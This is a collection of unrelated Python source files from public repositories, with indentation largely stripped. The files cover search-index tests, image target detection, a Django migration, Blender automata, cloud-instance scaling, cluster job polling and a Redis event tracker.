def make_index(self, dirname, schema, ixname):
if not os.path.exists(dirname):
os.mkdir(dirname)
st = FileStorage(dirname)
ix = st.create_index(schema, indexname = ixname)
return ix
def destroy_index(self, dirname):
if os.path.exists(dirname):
try:
rmtree(dirname)
except OSError, e:
pass
def test_20000_small_files(self):
sc = fields.Schema(id=fields.ID(stored=True), text=fields.TEXT)
ix = self.make_index("testindex", sc, "ix20000")
domain = ["alfa", "bravo", "charlie", "delta", "echo", "foxtrot",
"golf", "hotel", "india", "juliet", "kilo", "lima"]
for i in xrange(20000):
print i
w = ix.writer()
w.add_document(id=unicode(i),
text = u"".join(random.sample(domain, 5)))
w.commit()
ix.optimize()
ix.close()
self.destroy_index("testindex")
if __name__ == "__main__":
unittest.main()
| 1,299 |
src/hirails_hrfi/tracker/tracker.py
|
JPLMLIA/OWLS-Autonomy
| 5 |
2167321
|
'''
HRFI target detection.
Calling it a tracker for consistency with the other modules;
however, time is not currently factored into the tracking
'''
import json
import os
import logging
import numpy as np
from skimage.filters import threshold_otsu
from skimage.segmentation import clear_border
from skimage.measure import label, regionprops
from skimage.morphology import closing, square
from utils.file_manipulation import tiff_read
def hrfi_tracker(hrfi_filepath, experiment, config):
rgb = tiff_read(hrfi_filepath)
# Verify band weights in config
sum_band_w = np.round(config["instrument"]["red_band_weight"] + \
config["instrument"]["green_band_weight"] + \
config["instrument"]["blue_band_weight"], 3)
if sum_band_w != 1.0:
logging.warning(f"Instrument band weights don't sum to 1 ({sum_band_w}), normalizing.")
config["instrument"]['red_band_weight'] /= sum_band_w
config["instrument"]['green_band_weight'] /= sum_band_w
config["instrument"]['blue_band_weight'] /= sum_band_w
# Reduce 3 banded image to 1, with band weights being set by detector calibration
gray = ((config["instrument"]["red_band_weight"] * rgb[:,:,0]) +
(config["instrument"]["green_band_weight"] * rgb[:,:,1]) +
(config["instrument"]["blue_band_weight"] * rgb[:,:,2]))
# Scale data 0 to 1
gray = np.clip(gray, 0, config["instrument"]["max_dn"])
gray = gray / config["instrument"]["max_dn"]
# Determine threshold
t1 = threshold_otsu(gray)
t2 = np.percentile(gray, config["instrument"]["min_perc"])
t = max(t1, t2)
# Determine connected regions of whitespace and mark them as potential critters
image = np.zeros((rgb.shape[0],rgb.shape[1]))
image[gray > t] = 1
bw = closing(image==1, square(3))
cleared = clear_border(bw)
label_image = label(cleared)
# Keep only regions whose bounding-box area falls within the configured min/max
bboxes = [region.bbox for region in regionprops(label_image)
          if config["tracker"]["min_bbox_area"] <= region.area <= config["tracker"]["max_bbox_area"]]
track_folder = os.path.join(experiment, config['experiment_dirs']['track_dir'])
if not os.path.exists(track_folder):
os.makedirs(track_folder)
file_tag = hrfi_filepath.split("/")[-1].split(".")[0]
with open(os.path.join(track_folder, f"{file_tag}_bboxes.json"), 'w') as f:
json.dump(bboxes, f, indent=2)
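# --- Hypothetical usage sketch (not part of the original module) ---
# The config keys mirror the ones read above, but every concrete value, the
# file path and the experiment name are invented for illustration only.
if __name__ == "__main__":
    example_config = {
        "instrument": {"red_band_weight": 0.4, "green_band_weight": 0.3,
                       "blue_band_weight": 0.3, "max_dn": 4095, "min_perc": 99.9},
        "tracker": {"min_bbox_area": 9, "max_bbox_area": 10000},
        "experiment_dirs": {"track_dir": "tracks"},
    }
    hrfi_tracker("data/example_hrfi.tif", "experiments/example_run", example_config)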
| 2,564 |
Assignments/Lists Basics/Lab/03. Lists Statistics.py
|
KaloyankerR/python-fundamentals-repository
| 0 |
2170067
|
n = int(input())
positives = []
negatives = []
for i in range(n):
number = int(input())
if number >= 0:
positives.append(number)
else:
negatives.append(number)
print(positives)
print(negatives)
print(f'Count of positives: {len(positives)}. Sum of negatives: {sum(negatives)}')
| 308 |
huxley/core/migrations/0027_committee_feedback.py
|
srisainachuri/huxley
| 18 |
2169761
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-11-05 16:35
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [('core', '0026_auto_20171206_1716'), ]
operations = [
migrations.CreateModel(
name='CommitteeFeedback',
fields=[
('id', models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name='ID')),
('comment', models.TextField()),
('committee', models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to='core.Committee')),
],
options={
'db_table': 'committee_feedback',
}, ),
migrations.AddField(
model_name='delegate',
name='committee_feedback_submitted',
field=models.BooleanField(default=False), ),
migrations.AlterField(
model_name='registration',
name='committee_preferences',
field=models.ManyToManyField(
blank=True, null=True, to='core.Committee'), ),
]
| 1,301 |
Server/Python/tests/dbsserver_t/unittests/dao_t/Oracle_t/FileLumi_t/List_t.py
|
vkuznet/DBS
| 8 |
2170038
|
"""
dao unittests
"""
import os
import unittest
import logging
import copy
from dbsserver_t.utils.DaoConfig import DaoConfig
from dbsserver_t.utils.DBSDataProvider import create_dbs_data_provider, strip_volatile_fields
from dbs.dao.Oracle.FileLumi.List import List as FileLumiList
from types import GeneratorType
class List_t(unittest.TestCase):
@DaoConfig("DBSReader")
def __init__(self, methodName='runTest'):
super(List_t, self).__init__(methodName)
data_location = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'test_data.pkl')
self.data_provider = create_dbs_data_provider(data_type='transient', data_location=data_location)
self.lumi_data = self.data_provider.get_file_lumi_data()
#needs to be regenerated, since it was not used in Insert_t
self.block_data = self.data_provider.get_block_data(regenerate=True)
def setUp(self):
"""setup all necessary parameters"""
self.conn = self.dbi.connection()
self.dao = FileLumiList(self.logger, self.dbi, self.dbowner)
#List API returns a list of lumi sections, whereas the Insert API needs a single lumi_section_number per file
#IMHO that should be fixed
for entry in self.lumi_data:
if 'lumi_section_num' in entry:
entry['lumi_section_num'] = [entry['lumi_section_num']]
def tearDown(self):
"""Clean-up all necessary parameters"""
self.conn.close()
def test01(self):
"""dao.Oracle.FileLumi.List: Basic"""
result = self.dao.execute(self.conn, logical_file_name=self.lumi_data[0]['logical_file_name'])
self.assertTrue(type(result) == GeneratorType)
l = []
for i in result:
l.append(i)
self.assertEqual(strip_volatile_fields(l), self.lumi_data)
def test02(self):
"""dao.Oracle.FileLumi.List: Basic"""
result = self.dao.execute(self.conn, block_name=self.block_data[0]['block_name'])
self.assertTrue(type(result) == GeneratorType)
l =[]
for i in result:
l.append(i)
self.assertEqual(strip_volatile_fields(l), self.lumi_data)
if __name__ == "__main__":
SUITE = unittest.TestLoader().loadTestsFromTestCase(List_t)
unittest.TextTestRunner(verbosity=2).run(SUITE)
| 2,327 |
cellular automata/blender-scripting/automata_blender.py
|
ChrizH/data-science-learning
| 1 |
2168149
|
import bpy
import bmesh
from mathutils import Vector
import numpy as np
# Blender import system clutter
import sys
from pathlib import Path
UTILS_PATH = Path.home() / "Documents/python_workspace/data-science-learning"
sys.path.append(str(UTILS_PATH))
import utils.blender_utils
import importlib
importlib.reload(utils.blender_utils)
from utils.blender_utils import init_greasy_pencil
class Automaton_1D:
def __init__(self, n: int, states: int = 2):
"""
1D Automaton
:param n: number of cells
"""
self.n = n
self.space = np.zeros(n, dtype=np.uint8)
self.space[n // 2] = 1
# np.array([0,0,0,0,1,0,0,0,0,0])#np.random.choice(2, n)
def update(self, rule: dict):
"""
Update automaton state
"""
tmp_space = self.space.copy()
for i in range(self.n):
neighbours = self.get_neighbours(i)
tmp_space[i] = rule["".join([str(s) for s in neighbours])]
self.space = tmp_space
def get_neighbours(self, i: int):
if i == 0:
return np.insert(self.space[:2], 0, self.space[-1])
elif i == self.n - 1:
return np.insert(self.space[-2:], 2, self.space[0])
else:
return self.space[max(0, i - 1):i + 2]
def draw_cell(pos: tuple, gp_frame):
x, y, z = pos
gp_stroke = gp_frame.strokes.new()
gp_stroke.line_width = 500
gp_stroke.points.add(count=2)
gp_stroke.points[0].co = (x, 0, y)
gp_stroke.points[1].co = (x + 0.5, 0, y)
def animate_automata(rule):
automaton_size = 100
automaton = Automaton_1D(automaton_size)
nb_frames = 100
bpy.context.scene.frame_end = nb_frames
gp_layer = init_greasy_pencil()
gp_frame = gp_layer.frames.new(0)
#bpy.context.active_gpencil_brush.size = 100
#bpy.context.active_gpencil_brush.strength = 1.
# bpy.data.brushes["Draw Pencil"].size = 500
for frame in range(1, nb_frames+1):
#gp_frame = gp_layer.frames.new(frame)
gp_frame = gp_layer.frames.copy(gp_frame)
for i, cell in enumerate(automaton.space):
if cell:
draw_cell((i, frame, 0), gp_frame)
automaton.update(rule)
rule_0 = {'111': 1, '110': 1, '101': 1, '100': 1, '011': 1, '010': 1, '001': 1, '000': 0}
rule_sierpinski = {'111': 0, '110': 1, '101': 0, '100': 1, '011': 1, '010': 0, '001': 1, '000': 0}
rule_x = {'111': 0, '110': 0, '101': 0, '100': 1, '011': 1, '010': 1, '001': 1, '000': 0}
animate_automata(rule_0)
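# --- Hypothetical usage sketch (not part of the original script) ---
# Automaton_1D itself has no Blender dependency (importing this module does,
# via bpy); this prints a few generations of the Sierpinski rule as text.
def _print_evolution(rule, size=21, steps=10):
    automaton = Automaton_1D(size)
    for _ in range(steps):
        print("".join("#" if cell else "." for cell in automaton.space))
        automaton.update(rule)
# _print_evolution(rule_sierpinski)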
| 2,523 |
python/jaeger/scripts/generate_chiller_yaml.py
|
sdss/jaeger
| 1 |
2169308
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Author: <NAME> (<EMAIL>)
# @Date: 2021-12-13
# @Filename: generate_chiller_yaml.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
from __future__ import annotations
import sys
import pandas
import yaml
BASE = """
address: 10.25.1.162
port: 1111
modules:
CHILLER:
mode: holding_register
channels: -1
description: APO chiller status variables
devices: {}
"""
NAME_CONV = {
"STATUS_FLUID_FLOW_SV": "STATUS_FLUID_FLOW",
"USER_FLOW_SP_GPM_SV": "FLOW_USER_SETPOINT",
"STATUS_DISPLAY_VALUE_SV": "DISPLAY_VALUE",
"USER_SETPOINT_SV": "TEMPERATURE_USER_SETPOINT",
"STATUS_AMBIENT_AIR_SV": "STATUS_AMBIENT_AIR",
}
def generate_chiller_yaml(variables_files: str):
"""Generates a YAML file for Drift with all the chiller variables from the CSV."""
variables = pandas.read_csv(variables_files)
data = yaml.load(BASE, yaml.SafeLoader)
devices = {}
for _, row in variables.iterrows():
address = row.Address - 1
name = row.Name.upper()
if name in NAME_CONV:
name = NAME_CONV[name]
devices[name] = {
"address": address,
"units": row.Unit if isinstance(row.Unit, str) else "",
"category": "chiller",
"description": row.Description,
}
if row.Scale != 1:
devices[name].update(
{
"adaptor": "proportional",
"adaptor_extra_params": [0.1],
}
)
data["modules"]["CHILLER"]["devices"] = devices
with open("chiller.yaml", "w") as f:
yaml.dump(data, f, yaml.SafeDumper)
if __name__ == "__main__":
generate_chiller_yaml(sys.argv[1])
| 1,801 |
tools/scripts/graph/kmeans_generator.py
|
DaMSL/K3
| 17 |
2168644
|
import random
D = 32
K = 5
N = 1 * 1000000
means = [[j * 10 for i in range(D)] for j in range(-2, 3)]
for i in range(N):
mean = random.choice(means)
point = [random.gauss(c, 2.5) for c in mean]
print(','.join("{:0.8f}".format(i) for i in point))
| 262 |
client/e2e/client.py
|
t1anchen/peer-py
| 0 |
2167816
|
import requests
import time
import json
from ml import *
import sys
import os
import argparse
from log import client_logger
from collections import Counter
ENDPOINT = "http://localhost:5000"
# client_cache = {}
# DRY_RUN_MODE = os.environ["DRY_RUN_MODE"] == "1"
def create(opts: dict):
n_create = opts["create"]
if n_create > 0:
client_logger.info("Creating new instances")
res = requests.get(ENDPOINT + f"/resource/scale/{n_create}").json()
instances = res["result"]
client_logger.debug(instances)
client_logger.info("Waiting for initializing new instances ...")
wait(90)
for instance in instances:
pub_ret = requests.get(
ENDPOINT + f"/resource/{instance}/public_ip"
).json()
def list_running(opts: dict):
# get active instance
client_logger.info(f"Getting info for active instances ...")
res = requests.get(ENDPOINT + "/resource").json()
opts["active_instances"] = [
k
for k in res["result"].keys()
if res["result"][k]["state"] == "running"
]
client_logger.debug(res)
return opts
def train_sample(opts):
active_instances = opts["active_instances"]
sample_interval_nsecs = opts["sample_interval_nsecs"]
round_interval_nsecs = opts["round_interval_nsecs"]
rounds = opts["training_rounds"]
opts["train_samples"] = {}
if opts["offline"]:
return list_cache(opts)
# opts = list_cache(opts)
for instance in active_instances:
res = requests.post(
ENDPOINT + f"/resource/{instance}/cpu",
data=json.dumps(
{
"sample_interval_nsecs": sample_interval_nsecs,
"round_interval_nsecs": round_interval_nsecs,
"rounds": rounds,
}
),
headers={"content-type": "application/json"},
).json()
opts["train_samples"][instance] = res["result"]
opts = list_cache(opts)
for instance in active_instances:
cpu_uts = opts[instance].get("cpu_ut", [])
cpu_uts.append(opts["train_samples"][instance])
opts[instance]["cpu_ut"] = cpu_uts
return opts
def list_cache(opts):
# list cache
# global client_cache
res = requests.get(ENDPOINT + "/cache").json()
client_logger.info(f"cache = {res['result']}")
for k, v in res["result"]['instances'].items():
opts[k] = v
return opts
def model_train(opts: dict):
# global client_cache
# client_logger.info(f"opts = {opts}")
active_instances = opts["active_instances"]
client_logger.debug(f"opts = {opts}")
for ins_id in active_instances:
client_logger.info(f"Training model for For instance {ins_id}")
ins = opts[ins_id]
client_logger.debug(f"ins = {ins}")
ctx = {"ins_id": ins_id, "offline": opts["offline"]}
if opts["offline"]:
ctx["offline"] = True
else:
for ut in ins["cpu_ut"]:
ctx = configure(ctx, ins_id, ut)
ctx = train(ctx)
ctx = cv_score(ctx)
# overview(ctx)
opts[ins_id]["ml_ctx"] = ctx
def predict_sample(opts):
# global client_cache
active_instances = opts["active_instances"]
sample_interval_nsecs = opts["sample_interval_nsecs"]
round_interval_nsecs = opts["round_interval_nsecs"]
rounds = opts["predicting_rounds"]
is_dry_run = opts["dry_run"]
client_logger.info(f"Getting new data from remote ...")
ret = {}
for instance in active_instances:
res = requests.post(
ENDPOINT + f"/resource/{instance}/cpu",
data=json.dumps(
{
"sample_interval_nsecs": sample_interval_nsecs,
"round_interval_nsecs": round_interval_nsecs,
"rounds": rounds,
}
),
headers={"content-type": "application/json"},
).json()
opts[instance]["cpu_ut"].append(res["result"])
def model_predict(opts: dict):
# global client_cache
is_dry_run = opts["dry_run"]
active_instances = opts["active_instances"]
if not opts["offline"]:
predict_sample(opts)
client_logger.info(f"Predicting ...")
for ins_id in active_instances:
cpu_ut_size = len(opts[ins_id]["cpu_ut"])
client_logger.info(f"cpu_ut_size = {cpu_ut_size}")
ut = opts[ins_id]["cpu_ut"][-1]
ctx = opts[ins_id]["ml_ctx"]
new_ctx = configure({}, ins_id, ut)
ctx["X_test"] = new_ctx["X"]
ctx["y_test"] = new_ctx["y"]
ctx = predict(ctx)
# overview(ctx)
# best_algo, best_score = [
# (k, v)
# for k, v in sorted(
# ctx["mean_accuracy_score"].items(), key=lambda item: abs(np.sum(item[1]) - 1)
# )
# ][0]
best_algo, best_score = select_best(ctx)
y_pred = ctx["y_pred"][best_algo]
client_logger.info(
f"ins_id = {ins_id} best_algo = {best_algo}, best_score = {best_score}, y_pred = {y_pred}"
)
if is_idle(y_pred):
if not is_dry_run:
client_logger.info(f"instance {ins_id} is terminating")
ter_ret = requests.delete(
ENDPOINT + f"/resource/{ins_id}"
).json()
else:
client_logger.info(f"instance {ins_id} will be terminated")
def terminate_all(opts: dict):
active_instances = opts["active_instances"]
is_dry_run = opts["dry_run"]
for instance in active_instances:
if not is_dry_run:
client_logger.info(f"instance {instance} is terminating")
ter_ret = requests.delete(ENDPOINT + f"/resource/{instance}").json()
else:
client_logger.info(f"instance {instance} will be terminated")
def wait(timeout: int):
click = 0
while click < timeout:
localtime = time.localtime()
print(f"remaining {(timeout - click):02d} secs", end="\r")
click += 1
time.sleep(1)
print()
def is_idle(y_pred):
counted = {k: v for k, v in Counter(y_pred).items()}
labels = sorted(k for k in counted.keys())
if len(labels) > 1 and counted[0] > counted[1]:
return True
elif len(labels) == 1 and 0 in labels:
return True
else:
return False
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--create", type=int, default=0)
parser.add_argument("--dry-run", action="store_true")
parser.add_argument("--offline", action="store_true", default=False)
parser.add_argument("--sample-interval-nsecs", type=float, default=0.2)
parser.add_argument("--round-interval-nsecs", type=int, default=0)
parser.add_argument("--training-rounds", type=int, default=80)
parser.add_argument("--predicting-rounds", type=int, default=20)
opts = vars(parser.parse_args())
client_logger.info("==== total start ====")
start_time = time.time()
create(opts)
if opts["create"] > 0:
client_logger.info("simulating stress")
wait(90)
opts = list_running(opts)
opts = train_sample(opts)
model_train(opts)
model_predict(opts)
end_time = time.time()
client_logger.info(f"==== total elapsed {end_time - start_time}s ====")
# if opts["enable_termination"]:
# opts = terminate_all(opts)
main()
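# --- Hypothetical invocation examples (not part of the original client) ---
# The flags mirror the argparse options defined in main(); the service at
# http://localhost:5000 (ENDPOINT above) must be running for a real run.
#   python client.py --dry-run --offline
#   python client.py --create 2 --training-rounds 80 --predicting-rounds 20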
| 7,449 |
tests/test_actions.py
|
safuya/juniper
| 0 |
2168328
|
# -*- coding: utf-8 -*-
"""
test_actions.py
:copyright: © 2019 by the EAB Tech team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
from juniper import actions
from unittest.mock import MagicMock
from juniper.io import (reader, get_artifact_path)
logger = MagicMock()
def test_build_compose_sections():
"""
Using the processor-test as a sample definition of the lambda functions to
be packaged. Make sure that the resources portion of the file is correctly
generated.
The sections portion of the file takes into account the volume mappings
as well as the command to invoke when docker-compose is invoked.
"""
processor_ctx = reader('./tests/processor-test.yml')
result = actions._get_compose_sections(processor_ctx)
# The fully converted docker-compose.yml file as created by the action.
expected = read_expectation('./tests/expectations/processor-sections.yml')
assert result == expected
def test_build_compose_writes_compose_definition_to_tmp_file(mocker):
"""
The docker-compose file created is written to a tmp file. Make sure that
the file is written and validate that the contents of the file match the
expected result.
"""
tmp_filename = '/<KEY>'
mock_writer = mocker.patch('juniper.actions.write_tmp_file', return_value=tmp_filename)
processor_ctx = reader('./tests/processor-test.yml')
actual_filename = actions.build_compose(logger, processor_ctx)
expected = read_expectation('./tests/expectations/processor-compose.yml')
assert tmp_filename == actual_filename
assert mock_writer.call_args[0][0] == expected
def test_build_artifacts_invokes_docker_commands(mocker):
"""
Validate that the docker-compose commands are executed with valid parameters.
Since the docker-compose file was dynamically generated, we must pass the full
path of that file to the docker-compose command. Also, set the context of the execution
to the current path.
"""
tmp_filename = '<KEY>'
mock_builder = mocker.patch('juniper.actions.build_compose', return_value=tmp_filename)
# Mocking the dependencies of this action. These three high level packages are
# needed to invoke docker-compose in the right context!
mocker.patch('juniper.actions.os')
mocker.patch('juniper.actions.shutil')
mock_subprocess_run = mocker.patch('juniper.actions.subprocess.run')
compose_cmd_calls = [
mocker.call(["docker-compose", "-f", tmp_filename, '--project-directory', '.', 'down']),
mocker.call(["docker-compose", "-f", tmp_filename, '--project-directory', '.', 'up'])
]
processor_ctx = reader('./tests/processor-test.yml')
actions.build_artifacts(logger, processor_ctx)
mock_subprocess_run.assert_has_calls(compose_cmd_calls)
mock_builder.assert_called_once()
def test_build_artifacts_copies_scripts(mocker):
"""
Since the docker-compose command will be executed from within the context
of where the lambda functions live, we need to make sure that the `package.sh`
script lives in the right context.
Validate that a bin folder is temporarily created in the folder of the caller.
This folder will be removed after the .zip artifacts are generated.
"""
tmp_filename = '/var/folders/xw/yk2rrhks1w72y0zr_7t7b851qlt8b3/T/tmp52bd77s3'
mock_builder = mocker.patch('juniper.actions.build_compose', return_value=tmp_filename)
# Mocking the dependencies of this action. These three high level packages are
# needed to invoke docker-compose in the right context!
mock_os = mocker.patch('juniper.actions.os')
mock_shutil = mocker.patch('juniper.actions.shutil')
mocker.patch('juniper.actions.subprocess.run')
processor_ctx = reader('./tests/processor-test.yml')
actions.build_artifacts(logger, processor_ctx)
# Validate that this three step process is correctly executed.
mock_os.makedirs.assert_called_with('./.juni/bin', exist_ok=True)
mock_shutil.copy.assert_called_with(get_artifact_path('package.sh'), './.juni/bin/')
mock_shutil.rmtree.assert_called_with('./.juni', ignore_errors=True)
mock_builder.assert_called_once()
def test_build_compose_section_custom_output():
"""
Validate that given a custom output directory, the volume mapping includes
the custom value instead of the default dist.
"""
sls_function = {}
custom_output_dir = './build_not_dist'
template = '"function_name": "{name}", "volumes": "{volumes}"'
context = {'package': {'output': custom_output_dir}}
result = actions._build_compose_section(context, template, 'test_func', sls_function)
as_json = json.loads('{' + result.replace('\n', '\\n') + '}')
assert len([
volume.strip()
for volume in as_json['volumes'].split('\n')
if custom_output_dir in volume
])
def read_expectation(file_name):
with open(file_name, 'r') as f:
return f.read()
| 5,499 |
py/dcp/problems/daily/construct_pair.py
|
bmoretz/Daily-Coding-Problem
| 1 |
2169769
|
"""
Construct Pair.
cons(a, b) constructs a pair, and car(pair) and cdr(pair) returns the first and last element of that pair.
For example, car(cons(3, 4)) returns 3, and cdr(cons(3, 4)) returns 4.
Given this implementation of cons:
def cons(a, b):
def pair(f):
return f(a, b)
return pair
"""
from typing import Callable
def cons(a, b) -> Callable[[int, int], Callable]:
"""
definition from problem
Args:
a ([type]): first element
b ([type]): last element
"""
def pair(f):
return f(a, b)
return pair
def car(pair : Callable[[int, int], Callable]) -> int:
"""
return the first element of the pair by invoking
the closure returned by cons with a lambda that simply returns
its first argument.
Args:
pair ([type]): pair constructed with cons
Returns:
[type]: first element
"""
return pair(lambda a, _: a)
def cdr(pair : Callable[[int, int], Callable]) -> int:
"""
return the second element of the pair by invoking
the closure returned by cons with a lambda that simply returns
its second argument.
Args:
pair ([type]): pair constructed with cons
Returns:
[type]: second element
"""
return pair(lambda _, b: b)
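# --- Quick check, mirroring the examples in the problem statement above ---
if __name__ == "__main__":
    assert car(cons(3, 4)) == 3
    assert cdr(cons(3, 4)) == 4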
| 1,264 |
cluster/__init__.py
|
sepro/LSTrAP
| 7 |
2170247
|
import re
import sys
from subprocess import check_output, DEVNULL
from time import sleep
def detect_cluster_system():
"""
Checks which cluster manager is installed on the system, returns "SGE" for Sun/Oracle Grid Engine, "PBS" for
PBS/Torque based systems and otherwise "other"
:return: string "SGE", "PBS" or "other"
"""
try:
which_output = check_output(["which", "sge_qmaster"], stderr=DEVNULL).decode("utf-8")
if "/sge_qmaster" in which_output:
return "SGE"
except Exception as _:
pass
try:
which_output = check_output(["which", "pbs_sched"], stderr=DEVNULL).decode("utf-8")
if "/pbs_sched" in which_output:
return "PBS"
except Exception as _:
pass
return "other"
def job_running(job_name):
"""
Checks if a specific job is still running on a cluster using the qstat command
:param job_name: name of the submitted script/jobname
:return: boolean true if the job is still running or in the queue
"""
running_jobs = []
c_system = detect_cluster_system()
if c_system == "SGE":
# Sun/Oracle Grid engine detected
qstat = check_output(["qstat", "-r"]).decode("utf-8")
pattern = "Full jobname:\s*" + job_name
running_jobs = re.findall(pattern, qstat)
elif c_system == "PBS":
# PBS/Torque detected
qstat = check_output(["qstat", "-f"]).decode("utf-8")
pattern = "Job_Name = \s*" + job_name
running_jobs = re.findall(pattern, qstat)
else:
print("Unsupported System", file=sys.stderr)
if len(running_jobs) > 0:
print('Still %d jobs running.' % len(running_jobs), end='\r')
else:
print('\nDone!\n')
return bool(len(running_jobs) > 0)
def wait_for_job(job_name, sleep_time=5):
"""
Checks if a job is running and sleeps for a set number of minutes if it is
:param job_name: name of the job to check
:param sleep_time: time to sleep between polls (in minutes, default = 5)
"""
while job_running(job_name):
sleep(sleep_time*60)
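# --- Hypothetical usage sketch (not part of the original module) ---
# The job name is made up; on a machine without SGE or PBS the helpers report
# "Unsupported System" and wait_for_job returns immediately.
if __name__ == "__main__":
    print(detect_cluster_system())
    wait_for_job("example_job", sleep_time=1)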
| 2,131 |
models/models_preprocessing_template.py
|
MichiganCOG/M-PACT
| 98 |
2168315
|
import tensorflow as tf
import numpy as np
from utils.preprocessing_utils import *
def preprocess_for_train(image, output_height, output_width, resize_side):
"""Preprocesses the given image for training.
Args:
image: A `Tensor` representing an image of arbitrary size.
output_height: The height of the image after preprocessing.
output_width: The width of the image after preprocessing.
resize_side: The smallest side of the image for aspect-preserving resizing.
Returns:
A preprocessed image.
"""
############################################################################
# TODO: Add preprocessing done during training phase #
# Preprocessing option found in utils/preprocessing_utils.py #
# #
# EX: image = aspect_preserving_resize(image, resize_side) #
# image = central_crop([image], output_height, output_width)[0] #
# image.set_shape([output_height, output_width, 3]) #
# image = tf.to_float(image) #
# return image #
############################################################################
def preprocess_for_eval(image, output_height, output_width, resize_side):
"""Preprocesses the given image for evaluation.
Args:
image: A `Tensor` representing an image of arbitrary size.
output_height: The height of the image after preprocessing.
output_width: The width of the image after preprocessing.
resize_side: The smallest side of the image for aspect-preserving resizing.
Returns:
A preprocessed image.
"""
############################################################################
# TODO: Add preprocessing done during training phase #
# Preprocessing option found in utils/preprocessing_utils.py #
# #
# EX: image = aspect_preserving_resize(image, resize_side) #
# image = central_crop([image], output_height, output_width)[0] #
# image.set_shape([output_height, output_width, 3]) #
# image = tf.to_float(image) #
# return image #
############################################################################
def preprocess_image(image, output_height, output_width, is_training=False,
resize_side_min=RESIZE_SIDE_MIN):
"""Preprocesses the given image.
Args:
image: A `Tensor` representing an image of arbitrary size.
output_height: The height of the image after preprocessing.
output_width: The width of the image after preprocessing.
is_training: `True` if we're preprocessing the image for training and
`False` otherwise.
resize_side_min: The lower bound for the smallest side of the image for
aspect-preserving resizing. If `is_training` is `False`, then this value
is used for rescaling.
Returns:
A preprocessed image.
"""
if is_training:
return preprocess_for_train(image, output_height, output_width,
resize_side_min)
else:
return preprocess_for_eval(image, output_height, output_width,
resize_side_min)
# END IF
def preprocess(input_data_tensor, frames, height, width, channel, input_dims, output_dims, seq_length, size, label, istraining, video_step, input_alpha=1.0):
"""
Preprocessing function corresponding to the chosen model
Args:
:input_data_tensor: Raw input data
:frames: Total number of frames
:height: Height of frame
:width: Width of frame
:channel: Total number of color channels
:input_dims: Number of frames to be provided as input to model
:output_dims: Total number of labels
:seq_length: Number of frames expected as output of model
:size: Output size of preprocessed frames
:label: Label of current sample
:istraining: Boolean indicating training or testing phase
Return:
Preprocessing input data and labels tensor
"""
# Allow for resampling of input during testing for evaluation of the model's stability over video speeds
input_data_tensor = tf.cast(input_data_tensor, tf.float32)
input_data_tensor = resample_input(input_data_tensor, frames, frames, input_alpha)
# Apply preprocessing related to individual frames (cropping, flipping, resize, etc.... )
input_data_tensor = tf.map_fn(lambda img: preprocess_image(img, size[0], size[1], is_training=istraining, resize_side_min=size[0]), input_data_tensor)
##########################################################################################################################
# #
# TODO: Add any video related preprocessing (looping, resampling, etc.... Options found in utils/preprocessing_utils.py) #
# #
##########################################################################################################################
return input_data_tensor
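# --- Hypothetical example of a filled-in TODO block (not part of the template) ---
# Follows the EX comments above and assumes aspect_preserving_resize and
# central_crop are provided by utils/preprocessing_utils.py as those comments state.
def _example_preprocess_for_eval(image, output_height, output_width, resize_side):
    image = aspect_preserving_resize(image, resize_side)
    image = central_crop([image], output_height, output_width)[0]
    image.set_shape([output_height, output_width, 3])
    image = tf.to_float(image)
    return image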
| 5,713 |
redisEventTracker/__init__.py
|
Keyintegrity/redisEventTracker
| 0 |
2170114
|
# encoding: utf-8
from redis import StrictRedis
from datetime import datetime
import warnings
import logging
import socket
import time
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class Graphite(object):
def __init__(self, host='localhost', port=2003, prefix=''):
self.socket = socket.socket()
self.socket.connect((host, port))
self.prefix = 'event_tracker.'
if prefix:
self.prefix += prefix + '.'
def send_metric(self, metric_name, msg):
metric_name = self.prefix + metric_name
message = '%s %s %d\n' % (metric_name, msg, int(time.time()))
self.socket.sendall(message)
class Singleton(object):
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super(Singleton, cls).__new__(cls, *args, **kwargs)
return cls._instance
class EventTracker(Singleton):
_redis = None
def __init__(self, redis=None, host='localhost', port=6379, db=0, connection_pool=None, graphite_host=None,
graphite_port=2003, graphite_prefix=''):
self.set_connection_to_redis(redis or self.get_connection_to_redis(host=host, port=port, db=db,
connection_pool=connection_pool))
self.graphite_host = graphite_host
self.graphite_port = graphite_port
self.graphite = None
if graphite_host:
try:
self.graphite = Graphite(graphite_host, graphite_port, graphite_prefix)
except Exception as e:
msg = u"could not connect to graphite server: %s" % unicode(e)
warnings.warn(msg)
logger.warning(msg)
@staticmethod
def get_connection_to_redis(**kwargs):
return StrictRedis(**kwargs)
def set_connection_to_redis(self, redis):
self._redis = redis
def track_event(self, event_hash_name):
date = datetime.now().date()
try:
if not self._redis.sismember('dates', date):
self._redis.sadd('dates', date)
total = self._redis.hincrby(event_hash_name, date, 1)
if self.graphite:
self.graphite.send_metric(event_hash_name, total)
except Exception as e:
warnings.warn(unicode(e))
logger.exception(u'{0}; event: {1}'.format(unicode(e), event_hash_name))
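# --- Hypothetical usage sketch (not part of the original module) ---
# Assumes a Redis server on localhost:6379; the graphite_* arguments are left
# out. The event name "user_signup" is invented for illustration.
if __name__ == "__main__":
    tracker = EventTracker(host="localhost", port=6379, db=0)
    tracker.track_event("user_signup")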
| 2,470 |
notebooks/develop/2021-04-14-gc-hd-pos2gram_testing.py
|
grchristensen/avpd
| 0 |
2169284
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
from pathlib import Path
from os.path import join
from tqdm import tqdm
import random
from matplotlib import pyplot as plt
import math
project_root = Path('..')
